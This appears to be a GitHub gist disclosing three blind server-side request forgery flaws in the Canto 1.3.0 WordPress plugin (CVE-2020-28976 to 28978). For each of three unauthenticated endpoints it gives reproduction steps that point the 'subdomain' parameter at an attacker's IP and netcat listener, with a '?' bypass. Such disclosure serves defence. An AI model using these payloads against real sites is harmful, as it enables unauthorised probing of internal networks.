Created
November 25, 2020 11:50
-
-
Save p4nk4jv/87aebd999ce4b28063943480e95fd9e0 to your computer and use it in GitHub Desktop.
Wordpress Plugin Canto 1.3.0 - Blind SSRF Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Wordpress Plugin Canto 1.3.0 - Blind SSRF Vulnerability | |
## Multiple Server-Side Request Forgery Vulnerabilities found in Canto 1.3.0 version. | |
**Description:-** | |
The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerability. | |
It allows an unauthenticated attacker can make a request to any Internal and External Server via /includes/lib/detail.php?subdomain=SSRF. | |
**Steps To Reproduce:-** | |
1. Start a Netcat Listener on port 4499. | |
2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/detail.php?subdomain=" | |
3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter. | |
4. Observe the response we got from the Target. | |
Note: Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack. | |
**Reference: CVE-2020-28976** | |
**Description:-** | |
The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerability. | |
It allows an unauthenticated attacker can make a request to any Internal and External Server via /includes/lib/get.php?subdomain=SSRF. | |
**Steps To Reproduce:-** | |
1. Start a Netcat Listener on port 4499. | |
2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/get.php?subdomain=" | |
3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter. | |
4. Observe the response we got from the Target. | |
Note: Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack. | |
**Reference: CVE-2020-28977** | |
**Description:-** | |
The Canto plugin 1.3.0 for WordPress contains Blind SSRF Vulnerability. | |
It allows an unauthenticated attacker can make a request to any Internal and External Server via /includes/lib/tree.php?subdomain=SSRF. | |
**Steps To Reproduce:-** | |
1. Start a Netcat Listener on port 4499. | |
2. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/tree.php?subdomain=" | |
3. Add the Attacker's IP and Port For e.g. "172.17.0.1:4499?" to "subdomain=" parameter. | |
4. Observe the response we got from the Target. | |
Note: Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack. | |
**Reference: CVE-2020-28978** |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment